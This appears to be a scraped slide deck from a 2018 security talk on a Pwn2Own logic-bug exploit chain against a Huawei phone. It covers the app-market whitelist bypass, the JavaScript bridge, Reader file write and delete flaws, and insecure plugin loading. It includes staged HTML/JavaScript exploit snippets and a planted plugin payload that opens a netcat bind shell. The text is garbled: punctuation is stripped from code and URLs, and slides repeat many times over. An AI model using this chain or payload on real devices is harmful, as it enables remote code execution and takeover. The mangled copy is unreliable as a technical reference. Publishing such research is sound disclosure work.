HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 7: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/7.jpg)
Huawei Mate 9 Pro
6
PWN2OWN
Execute arbitrary instructionshellip
hellipretrieve sensitive informationhellip
hellipa full sandbox escape is requiredhellip
hellipwithout any user interaction
8
Pwn2Own Categories and Choice
9
PWN2OWN ndash Results
10
PUBLIC
Bug Hunting Approach
Browser attack surface
12
Exploit Mitigation Advancement
bull Memory Safety Mitigations
ndash ASLR PIE RELTO PartitionAlloc
bull Means you need mitigation bypass vulnerabilities too
bull Time consuming debugging memory corruption exploits on a real device
13
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 8: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/8.jpg)
PWN2OWN
Execute arbitrary instructionshellip
hellipretrieve sensitive informationhellip
hellipa full sandbox escape is requiredhellip
hellipwithout any user interaction
8
Pwn2Own Categories and Choice
9
PWN2OWN ndash Results
10
PUBLIC
Bug Hunting Approach
Browser attack surface
12
Exploit Mitigation Advancement
bull Memory Safety Mitigations
ndash ASLR PIE RELTO PartitionAlloc
bull Means you need mitigation bypass vulnerabilities too
bull Time consuming debugging memory corruption exploits on a real device
13
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 9: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/9.jpg)
Pwn2Own Categories and Choice
9
PWN2OWN ndash Results
10
PUBLIC
Bug Hunting Approach
Browser attack surface
12
Exploit Mitigation Advancement
bull Memory Safety Mitigations
ndash ASLR PIE RELTO PartitionAlloc
bull Means you need mitigation bypass vulnerabilities too
bull Time consuming debugging memory corruption exploits on a real device
13
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
